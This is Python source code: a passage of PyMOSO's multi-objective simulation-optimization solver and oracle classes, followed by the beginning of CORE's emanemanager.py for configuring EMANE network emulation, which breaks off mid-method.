"""
self.upsample(mcS | {self.x0})
unconst = float('inf')
kcon = 0
xmin = set()
krange = range(self.num_obj)
mcT = set()
for k in krange:
kmin = min(mcS | {self.x0}, key=lambda t: self.gbar[t][k])
tb, xmink, _, _ = self.spline(kmin, unconst, k, kcon)
xmin |= {xmink}
mcT |= tb
tmp = {x: self.gbar[x] for x in xmin | mcS | mcT | {self.x0}}
xmin = get_nondom(tmp)
return xmin
def spline(self, x0, e=float('inf'), nobj=0, kcon=0):
"""
        Generate a sample path local minimizer using pseudo-gradients
Parameters
----------
x0 : tuple of int
Feasible point of orc
e : float
            Constraint such that the minimum 'fxn' < 'e'. Defaults to
float('inf'), i.e. unconstrained.
nobj : int
            Index of the objective to minimize, takes {0, 1,..., num_obj - 1}
Defaults to 0, the first objective
kcon : int
            Index of the objective to constrain, takes {0, 1,..., num_obj - 1}
Defaults to 0.
Returns
-------
mcT : set of tuples of numbers
The set of visited points
xn : tuple of int
The feasible minimizer
fxn : tuple of float
Objective values of 'xn'
sexn : tuple of float
Standard errors of 'fxn'
"""
fx0 = self.gbar[x0]
sex0 = self.sehat[x0]
b = self.b
bp = 0
xn = x0
fxn = fx0
sexn = sex0
mcT = set()
should_stop = False
while not should_stop:
xs, fxs, sexs, np = self.spli(xn, fxn, sexn, e, nobj, kcon, b)
mcT |= {xs}
xn, fxn, sexn, npp = self.ne(xs, fxs, sexs, nobj, e, kcon)
mcT |= {xn}
bp += np + npp
if bp >= b or fxn[nobj] == fxs[nobj]:
should_stop = True
return mcT, xn, fxn, sexn
def ne(self, x, fx, sex, nobj, e=float('inf'), kcon=0):
"""
Finds a neighborhood point with an objective value smaller than
that of a given point.
Parameters
----------
x : tuple of int
Feasible point around which to perform the neighborhood
search
fx : tuple of float
Objective values of 'x'
sex : tuple of float
Standard errors of 'fx'
nobj : int
index of the objective to minimize, takes values in
            {0, 1, ..., num_obj - 1}, default is 0
e : float
constraint such that solution objective value < 'e', default
is float('inf') i.e. unconstrained
kcon : int
index of the objective to constrain less than 'e', takes
            values in {0, 1, ..., num_obj - 1}, default is 0
Returns
-------
xs : tuple of int
Feasible point which minimizes the neighborhood of 'x'
fxs : tuple of float
Objective values of 'xs'
sexs : tuple of float
Standard errors of 'fxs'
"""
q = self.dim
m = self.m
n = 0
xs = x
fxs = fx
vxs = sex
nbor_rad = self.nbor_rad
# optimize the case for neighborhood radius of 1
if nbor_rad == 1:
for i in range(q):
xp1 = tuple(x[j] + 1 if i == j else x[j] for j in range(q))
xm1 = tuple(x[j] - 1 if i == j else x[j] for j in range(q))
isfeas1, fxp1, vxp1 = self.estimate(xp1, e, kcon)
if isfeas1:
n += m
if fxp1[nobj] < fxs[nobj]:
xs = xp1
fxs = fxp1
vxs = vxp1
return xs, fxs, vxs, n
isfeas2, fxm1, vxm1 = self.estimate(xm1, e, kcon)
if isfeas2:
n += m
if fxm1[nobj] < fxs[nobj]:
xs = xm1
fxs = fxm1
vxs = vxm1
return xs, fxs, vxs, n
else:
# for neighborhoods not 1, generate the list of neighbors
nbors = get_nbors(x, nbor_rad)
# and check each neighbor until we find a better one
for nb in nbors:
isfeas, fn, sen = self.estimate(nb, e, kcon)
if isfeas:
n += m
if fn[nobj] < fxs[nobj]:
xs = nb
fxs = fn
vxs = sen
break
return xs, fxs, vxs, n
def pli(self, x, e, nobj, kcon):
"""
Generate a convex hull and construct a pseudo-gradient
Parameters
----------
x : tuple of int
Feasible point
e : float
Feasibility constraint on points in the convex hull
nobj : int
Index of objective on which to construct the pseudo-gradient
kcon : int
            Index of the objective to constrain
Returns
-------
gamma : tuple of float
direction of the pseudo-gradient
gbat : tuple of float
interpolated objective values of the perturbed 'x'
xbest : tuple of int
minimizer of 'x' and its convex hull
fxbest : tuple of float
minimum value of 'x' and its convex hull
"""
q = self.dim
x0 = tuple(floor(x[i]) for i in range(q))
simp = [x0]
zi = [x[i] - x0[i] for i in range(q)]
zi.extend((0, 1))
p = argsort(zi)
p.reverse()
z = sorted(zi, reverse=True)
w = tuple(z[i] - z[i + 1] for i in range(q + 1))
prevx = x0
for i in range(1,q + 1):
x1 = tuple(prevx[j] + 1 if j == p[i] else prevx[j] for j in range(q))
simp.append(x1)
prevx = x1
n = 0
t = 0
gbat = 0
ghat = {}
xbest = None
fxbest = None
for i in range(q + 1):
isfeas, fx, vx = self.estimate(simp[i])
if isfeas:
isfeas2, fx, vx = self.estimate(simp[i], e, kcon)
if isfeas2:
if not xbest:
xbest = simp[i]
fxbest = fx
else:
if fx[nobj] < fxbest[nobj]:
xbest = simp[i]
fxbest = fx
n += 1
t += w[i]
gbat += w[i]*fx[nobj]
ghat[simp[i]] = fx
if t > 0:
gbat /= t
else:
gbat = float('inf')
if n < q + 1:
gamma = None
else:
gamma = [0]*q
for i in range(1, q + 1):
gamma[p[i]] = ghat[simp[i]][nobj] - ghat[simp[i - 1]][nobj]
return gamma, gbat, xbest, fxbest
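    # Worked example, illustrative only: for x = (1.3, 2.7), pli builds the
    # simplex (1, 2), (1, 3), (2, 3) with weights w = (0.3, 0.4, 0.3), since
    # 0.3*(1,2) + 0.4*(1,3) + 0.3*(2,3) = (1.3, 2.7); gbat is then the
    # w-weighted average of the simplex objective values.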
def spli(self, x0, fx0, sex0, e, nobj, kcon, b):
"""
Repeatedly construct pseudo-gradients and search the direction
for optimal feasible points.
Parameters
----------
x0 : tuple of int
Feasible point from which to search
fx0 : tuple of float
Objective values of 'x0'
sex0 : tuple of float
Standard errors of 'fx0'
e : float
Constraint on the values of the minimizer
nobj : int
Index of objective to minimize, takes values in
            {0, 1, ..., num_obj - 1}
kcon : int
Index of objective to constrain less than 'e', takes values
            in {0, 1, ..., num_obj - 1}
b : int
Limit on calls to orc.g when searching
Returns
-------
xs: tuple of int
The point with the smallest value found by searching the
            pseudo-gradients
fxs : tuple of float
The objective values of 'xs'
sexs : tuple of float
The standard errors of 'fxs'
n : int
The number of new calls to orc.g
"""
sprn = self.sprn
m = self.m
q = len(x0)
ss = 2.0
c = 2.0
xs = x0
fxs = fx0
sexs = sex0
n = 0
stop_loop = False
while not stop_loop:
x1 = perturb(x0, sprn)
gamma, gbat, xbest, fxbest = self.pli(x1, e, nobj, kcon)
if xbest:
if fxbest[nobj] < fxs[nobj]:
xs = xbest
fxs = fxbest
n += m*(q + 1)
if not gamma or gamma == [0.0]*q:
stop_loop = True
break
if n > b:
stop_loop = True
break
i = 0
x0 = xs
should_stop = False
while not should_stop:
i += 1
s = ss*pow(c, i - 1)
x1 = tuple(int(floor(x0[j] - s*gamma[j]/enorm(gamma))) for j in range(q))
isfeas, fx1, sex1 = self.estimate(x1, e, kcon)
if isfeas:
n += m
if fx1[nobj] < fxs[nobj]:
xs = x1
fxs = fx1
sexs = sex1
if not x1 == xs or n > b:
should_stop = True
x0 = xs
if i <= 2:
stop_loop = True
return xs, fxs, sexs, n
def estimate(self, x, con=float('inf'), nobj=0):
"""
Wraps simulation calls, updates the number of simulation calls,
performs feasibility checks, and stores the resulting objective
values.
Parameters
----------
x : tuple of int
Point to simulate
con : float
Constraint value to check feasibility, default is
float('inf') i.e. unconstrained
nobj : int
            Index of the objective checked against 'con', default is 0,
            takes values in {0, 1, ..., num_obj - 1}
Returns
-------
isfeas : bool
            True if 'x' is feasible to the simulation and 'fx[nobj]' <= 'con'
fx : tuple of float
Objective values of 'x'
vx : tuple of float
Standard errors of 'fx'
"""
m = self.m
#first, check if x has already been sampled in this iteration
if x in self.gbar:
isfeas = True
fx = self.gbar[x]
vx = self.sehat[x]
#if not, perform sampling
else:
#print('in: ', self.orc.rng.get_seed())
try:
isfeas, fx, vx = self.orc.hit(x, m)
except TypeError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure the g signature is g(self, x, rng). ')
print('--* Ensure isfeas, (obj1, obj2, ...) is returned. ')
print('--* Aborting. ')
sys.exit()
except ZeroDivisionError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
except ValueError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure the g signature is g(self, x, rng). ')
print('--* Ensure isfeas, (obj1, obj2, ...) is returned. ')
print('--* Aborting. ')
sys.exit()
except AttributeError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Are you missing an import?')
print('--* Aborting. ')
sys.exit()
except IndexError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure len(obj1, obj2, ..) == num_obj')
print('--* Aborting. ')
sys.exit()
except:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
if isfeas:
#print('out: ', self.orc.rng.get_seed())
self.num_calls += m
self.gbar[x] = fx
self.sehat[x] = vx
#next, check feasibility against the constraint which may be different
# than oracle feasibility
if isfeas:
if fx[nobj] > con:
isfeas = False
return isfeas, fx, vx
# def spsolve(self, warm_start):
# """Solve a sample path problem. Implement this in the child class."""
# pass
def upsample(self, mcS):
"""
Estimate points at the sample size of the current iteration and
store the results.
Parameters
----------
mcS : set of tuple of int
            Set of feasible points to estimate
Returns
-------
outset : set of tuple of int
Subset of 'mcS' which are feasible
"""
outset = set()
for s in mcS:
isfeas, fs, ses = self.estimate(s)
if isfeas:
outset |= {s}
return outset
def calc_m(self, nu):
"""
Compute the iteration sample size
Parameters
----------
nu : int
the iteration number
Returns
-------
int
The sample size
"""
mmul = 1.1
m_init = self.mconst
return ceil(m_init*pow(mmul, nu))
def calc_b(self, nu):
"""
Compute the iteration search sample limit
Parameters
----------
nu : int
the iteration number
Returns
-------
int
The sample limit
"""
mmul = 1.2
m_init = self.bconst*(self.dim - 1)
return ceil(m_init*pow(mmul, nu))
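    # Illustrative schedule, assuming the defaults mconst=2, bconst=8, dim=2:
    # calc_m yields ceil(2*1.1**nu) = 3, 3, 3, 3, 4, ... and calc_b yields
    # ceil(8*1.2**nu) = 10, 12, 14, 17, 20, ... for nu = 1, 2, 3, 4, 5.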
def remove_nlwep(self, mcS):
"""
        Remove non-LWEPs from a set and return the points that cause the
removals.
Parameters
----------
mcS : set of tuple of int
Set of feasible points
Returns
-------
lwepset : set of tuple of int
Subset of 'mcS' which are LWEP's
domset : set of tuple of int
Set which causes points in 'mcS' to be removed
"""
if not mcS:
            print('--* Unknown Error: Function remove_nlwep received an empty set.')
print('--* Aborting. ')
sys.exit()
r = self.nbor_rad
lwepset = set()
domset = set()
delz = [0]*self.num_obj
nbors = get_setnbors(mcS, r)
nbors = self.upsample(nbors)
tmpd = {x: self.gbar[x] for x in mcS | nbors}
for s in mcS:
islwep, dompts = is_lwep(s, r, tmpd)
if islwep:
lwepset |= {s}
else:
domset |= dompts
return lwepset, domset
class RLESolver(RASolver):
"""
Base class for Retrospective Approximation algorithm
implementations which rely on the RLE routine for convergence.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
dim : int
The cardinality of points in the domain of orc.g
nbor_rad : int
        The radius used to determine point neighbors, default is 1
mconst : int
Affects the iteration sample sizes. Default is 2
bconst : int
        Affects the iteration sampling search limits. Default is 8.
    sprn : prng.MRG32k3a object
Pseudo-random number stream available to the solver, should
generate independently of orc.rng. Required.
x0 : tuple of numbers
Vector points such that x0[0] is its first component, and
x0[orc.dim - 1] is the last. Required.
gbar : dict
Dictionary of {tuple of int: tuple of float} mapping feasible
points to their objective values. In RA algorithms, it is
cleared every iteration.
sehat : dict
Like gbar, but maps feasible points to standard errors of
the objective values.
m : int
Iteration sample size which is automatically updated
b : int
Iteration search sampling limit which is automatically updated
nu : int
The iteration number
endseed : tuple of int
The next seed to be used by 'orc.rng'
betadel : float
Affects the search relaxation in RLE. Defaults to 0.5.
Parameters
----------
orc : Oracle object
kwargs : dict
Notes
-----
    The method accel must be implemented to use an RLESolver in
PyMOSO.
"""
def __init__(self, orc, **kwargs):
self.betadel = kwargs.pop('betadel', 0.5)
super().__init__(orc, **kwargs)
def spsolve(self, warm_start):
"""
        Skeleton function which solves the sample path problem implicit
in 'orc.g' by calling 'accel' then 'rle'.
Parameters
----------
warm_start : set of tuple of int
Set of feasible points which solve the sample path problem
of the previous iteration
Returns
-------
ales : set of tuple of int
Set of feasible points which solve the sample path problem
of the current iteration
"""
try:
anew = self.accel(warm_start)
except AttributeError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Missing an import?')
print('--* Aborting. ')
sys.exit()
except ZeroDivisionError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
except TypeError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Points must be tuples.')
print('--* Aborting. ')
sys.exit()
except:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
ales = self.rle(anew)
return ales
# def accel(self, warm_start):
# """Accelerate RLE - Implement this function in a child class."""
# return warm_start
def rle(self, mcS):
"""
Generate an ALES from a set of feasible points
Parameters
----------
mcS : set of tuple of int
Set of feasible points
Returns
-------
mcS : set of tuple of int
Set of feasible points which are an ALES
"""
mcXw = {self.x0}
# try:
mcS = self.upsample(mcS | mcXw)
# except TypeError:
# print('--* RLE Error: Failed to upsample.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Ensure accel function returns a set.')
# print('--* Aborting. ')
# sys.exit()
# except:
# print('--* RLE Error: Failed to upsample.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Aborting. ')
# sys.exit()
b = self.b
n = 0
# try:
tmp = {s: self.gbar[s] for s in mcS | mcXw}
# except KeyError:
# print('--* RLE Error: No simulated points.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Is x0 feasible?')
# print('--* Aborting. ')
# sys.exit()
mcS = get_nondom(tmp)
mcNnc = self.get_ncn(mcS)
while n <= b and mcNnc:
old_calls = self.num_calls
mcNw, mcNd = self.remove_nlwep(mcNnc)
mcNd -= mcS
rlwepcalls = self.num_calls - old_calls
mcS |= mcNw
if not mcNw:
mcXw = self.seek_lwep(mcNd, mcS)
mcS |= mcXw
tmp = {s: self.gbar[s] for s in mcS | {self.x0}}
mcS = get_nondom(tmp)
old_calls = self.num_calls
mcNnc = self.get_ncn(mcS)
ncncalls = self.num_calls - old_calls
n += rlwepcalls + ncncalls
return mcS
def get_ncn(self, mcS):
"""
Generate the Non-Conforming neighborhood of a candidate ALES.
Parameters
----------
mcS : set of tuple of int
Set of feasible points which do not dominate each other
Returns
-------
ncn : set of tuple of int
Set of feasible points which cause mcS to not be an ALES
"""
# initialize the non-conforming neighborhood
ncn = set()
#nisdom = set()
d = self.num_obj
r = self.nbor_rad
dr = range(d)
delN = get_setnbors(mcS, r)
delzero = tuple(0 for i in dr)
        # definition 9 (a) -- check for strict domination in the deleted nbors
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
#dels = tuple(self.calc_delta(ses[i]) for i in dr)
snb = get_nbors(s, r) - mcS
for x in snb:
isfeas, fx, sex = self.estimate(x)
if isfeas:
#delx = tuple(self.calc_delta(sex[i]) for i in dr)
if does_strict_dominate(fx, fs, delzero, delzero):
ncn |= {x}
# if does_strict_dominate(fs, fx, delzero, delzero):
# nisdom |= {x}
# definition 9 (b) initialization
for x in delN - ncn:
isfeas, fx, sex = self.estimate(x)
if isfeas:
# definition 9 (b) (i) initialization
notweakdom = True
# definition 9 (b) (ii) initialization
notrelaxdom = True
# definition 9 (b) (iii) initialization
wouldnotchange = True
doesweakdom = False
# set the relaxation of the neighbor
delx = tuple(self.calc_delta(sex[i]) for i in dr)
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
if does_weak_dominate(fx, fs, delzero, delzero):
doesweakdom = True
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
# set the relaxation of the LES candidate member
dels = tuple(self.calc_delta(ses[i]) for i in dr)
# definition 9 (b) (i)
if does_weak_dominate(fs, fx, delzero, delzero):
notweakdom = False
# definition 9 (b) (ii)
if does_dominate(fx, fs, delzero, delzero) and does_weak_dominate(fs, fx, dels, delx):
notrelaxdom = False
# definition 9 (b) (iii)
if does_weak_dominate(fs, fx, dels, delx) or does_weak_dominate(fx, fs, delx, dels):
wouldnotchange = False
# definition 9 (b)
if notweakdom and notrelaxdom and (doesweakdom or wouldnotchange):
ncn |= {x}
return ncn
def seek_lwep(self, mcNd, mcS):
"""
Find a sample path LWEP
Parameters
----------
mcNd : set of tuple of int
Set of points which dominate non-conforming points
mcS : set of tuple of int
Set of candidate ALES points
Returns
-------
mcXw : set of tuple of int
Set of new LWEP's neither in nor dominated by members of
mcS or mcNd.
"""
b = self.b
n = 0
mcXw = set()
xnew = set() | mcNd
while not mcXw and n <= b:
old_calls = self.num_calls
mcXw, mcXd = self.remove_nlwep(xnew)
xnew = set([x for x in mcXd])
n += self.num_calls - old_calls
if not mcXw:
mcXw |= xnew
return mcXw
def calc_delta(self, se):
"""
Compute the RLE parameter for the current iteration.
Parameters
----------
se : float
Standard error of the objective value to be relaxed
Returns
-------
relax : float
"""
m = self.m
relax = se/pow(m, self.betadel)
return relax
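    # Example, illustrative only: with m = 100 and the default betadel = 0.5,
    # a standard error of 2.0 relaxes to 2.0/100**0.5 = 0.2, so the RLE
    # relaxation tightens as the iteration sample size grows.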
class Oracle(object):
"""
Base class to implement black-box simulations that implicitly
define a MOSO problem.
Attributes
----------
rng : prng.MRG32k3a object
pseudo-random number generator used by the Oracle to simulate
objective values at feasible points
crnold_state : tuple
Tuple of length 2. The first item is a tuple of int, which is
an mrg32k3a seed. The second is random.Random state.
crn_obsold : tuple
Like crnold_state
crnflag : bool
Indicates whether common random numbers is turned on or off.
Defaults to off.
simpar : int
Number of processes to use when doing simulations. Defaults to 1
dim : int
Number of dimensions of feasible points
num_obj : int
Number of objectives returned by g
Parameters
----------
rng : prng.MRG32k3a object
"""
def __init__(self, rng):
self.rng = rng
self.crnold_state = rng.getstate()
self.crnflag = False
self.crn_obsold = rng.getstate()
super().__init__()
def set_simpar(self, simpar):
"""
        Initialize processes when parallel replication is enabled.
Parameters
----------
simpar : int
Number of processes to use when performing simulation replications.
"""
self.simpar = simpar
if self.simpar > 1:
self.req_q = Queue()
self.res_q = Queue()
self.proc = []
for i in range(self.simpar):
p = Process(target=mp_worker, args=(self.req_q, self.res_q))
p.start()
self.proc.append(p)
def mp_cleanup(self):
"""
        Terminate all multiprocessing processes created in `set_simpar`. Call
this after simulation is complete.
"""
if self.simpar > 1:
for p in self.proc:
p.terminate()
p.join()
def set_crnflag(self, crnflag):
"""
        Set the common random number (crn) flag and initialize the
crn states.
Parameters
----------
crnflag: bool
"""
self.crnflag = crnflag
self.crnold_state = self.rng.getstate()
def set_crnold(self, old_state):
"""
Set the crn rewind state.
Parameters
----------
old_state : tuple
"""
self.crnold_state = old_state
def crn_reset(self):
"""
Rewind to the 'crnold_state'.
"""
crn_state = self.crnold_state
self.rng.setstate(crn_state)
self.crn_setobs()
def crn_advance(self):
"""
Jump ahead to the new crn baseline, and set the new rewind point
"""
self.crn_check()
self.rng = get_next_prnstream(self.rng.get_seed(), self.crnflag)
new_oldstate = self.rng.getstate()
self.set_crnold(new_oldstate)
self.crn_obsold = new_oldstate
if self.crnflag:
self.rng.generate.cache_clear()
self.rng.bsm.cache_clear()
def crn_check(self):
'''
Reset to crn_oldstate if crnflag
'''
if self.crnflag:
self.crn_reset()
def crn_setobs(self):
'''
Set an intermediate rewind point for jumping correctly.
'''
state = self.rng.getstate()
self.crn_obsold = state
def crn_nextobs(self):
'''
Jump to the next substream from the start of the previous.
'''
state = self.crn_obsold
self.rng.setstate(state)
jump_substream(self.rng)
self.crn_setobs()
def bump(self, x, m):
"""
Simulate 'm' replications at 'x' and return the replication
values as a list
Parameters
----------
x : tuple of int
point at which to simulate
m : int
number of replications to simulate 'x'
Returns
-------
isfeas : bool
Indicates if 'x' is feasible
obs : list of tuple of float
list of length 'm' of simulated objective values
"""
d = self.num_obj
dr = range(d)
isfeas = False
obs = []
if m < 1:
print('--* Error: Number of replications must be at least 1. ')
print('--* Aborting. ')
sys.exit()
else:
mr = range(m)
feas = []
for i in mr:
oisfeas, objd = self.g(x, self.rng)
feas.append(oisfeas)
obs.append(objd)
self.crn_nextobs()
if all(feas):
isfeas = True
self.crn_check()
return isfeas, obs
def hit(self, x, m):
"""
Generate the means and standard errors of 'm' simulation
replications at point 'x'.
Parameters
----------
x : tuple of int
point at which to simulate
m : int
number of replications to simulate 'x'
Returns
-------
isfeas : bool
indicates the feasibility of 'x'
obmean : tuple of float
mean of each objective of 'm' simulations
obse : tuple of float
            standard errors of each objective over 'm' simulations
"""
d = self.num_obj
dr = range(d)
isfeas = False
obmean = []
obse = []
mr = range(m)
        assert m >= 1
if m == 1:
isfeas, objd = self.g(x, self.rng)
obmean = objd
obse = [0 for o in objd]
self.crn_nextobs()
else:
feas = []
objm = []
# take replications in parallel
if self.simpar > 1:
for i in mr:
# we will reconstruct objects within `mp_replicate` and then
# compute the replications in parallel
orccls = type(self)
rngcls = type(self.rng)
cseed = self.rng.get_seed()
proc_job = (mp_replicate, (orccls, x, rngcls, cseed))
self.req_q.put(proc_job)
self.crn_nextobs()
for i in mr:
# block until parallel results are ready
isfeasi, oval = self.res_q.get()
feas.append(isfeasi)
objm.append(oval)
# do not take replications in parallel
else:
for i in mr:
isfeasi, oval = self.g(x, self.rng)
feas.append(isfeasi)
objm.append(oval)
self.crn_nextobs()
if all(feas):
isfeas = True
obmean = tuple([mean([objm[i][k] for i in mr]) for k in dr])
obvar = [variance([objm[i][k] for i in mr], obmean[k]) for k in dr]
obse = tuple([sqrt(obvar[i]/m) for i in dr])
self.crn_check()
return isfeas, obmean, obse
def g(self, x, rng):
"""
Generate a single replication at point `x`.
Parameters
----------
x : tuple
rng : random.Random object
Returns
-------
bool
Indicates feasibility of `x`
tuple of float
The simulated values for each objective
"""
raise NotImplementedError
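class ExampleOracle(Oracle):
    """
    Hedged sketch, illustrative only (not shipped with PyMOSO): a minimal
    Oracle subclass with two noisy objectives over integer points,
    feasible on the box 0 <= x[i] <= 10.
    """
    def __init__(self, rng):
        self.num_obj = 2
        self.dim = 2
        super().__init__(rng)
    def g(self, x, rng):
        # feasibility is checked separately from the (always-computed) objectives
        isfeas = all(0 <= xi <= 10 for xi in x)
        obj1 = x[0]**2 + rng.normalvariate(0, 1)
        obj2 = (x[1] - 5)**2 + rng.normalvariate(0, 1)
        return isfeas, (obj1, obj2)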
|
emanemanager.py | """
emanemanager.py: definition of an EmaneManager class for implementing configuration control of an EMANE emulation.
"""
import copy
import logging
import os
import threading
from core import CoreCommandError, CoreError, constants, utils
from core.api.tlv import coreapi, dataconversion
from core.config import ConfigGroup, ConfigShim, Configuration, ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.emulator.enumerations import (
ConfigDataTypes,
ConfigFlags,
ConfigTlvs,
MessageFlags,
MessageTypes,
NodeTypes,
RegisterTlvs,
)
from core.nodes import nodeutils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel,
]
DEFAULT_EMANE_PREFIX = "/usr"
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
        Creates an EmaneManager instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int(
"emane_platform_port", 8100
)
self.transformport = self.session.options.get_config_int(
"emane_transform_port", 8200
)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.id as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.id
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(
node_id=interface.node.id, config_type=model_name
)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
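    # Example, illustrative only: for interface.node.id == 5 and
    # interface.netindex == 2 the interface-specific lookup key is
    # 1000 * 5 + 2 == 5002; lookup then falls back to node 5's own config
    # and finally to the config stored under the passed-in node_id.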
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error(
"invalid emane event service device provided: %s", self.event_device
)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(
net_index=eventnetidx, remove=False, conf_required=False
)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# disabled otachannel for event service
# only needed for e.g. antennaprofile events xmit by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.debug("loading emane model: %s", emane_model.__name__)
emane_prefix = self.session.options.get_config(
"emane_prefix", default=DEFAULT_EMANE_PREFIX
)
emane_model.load(emane_prefix)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.id in self._emane_nodes:
raise KeyError(
"non-unique EMANE object id %s for %s" % (emane_node.id, emane_node)
)
self._emane_nodes[emane_node.id] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._objslock already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._nodes_lock:
for node_id in self.session.nodes:
node = self.session.nodes[node_id]
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug(
"adding emane node: id(%s) name(%s)", node.id, node.name
)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
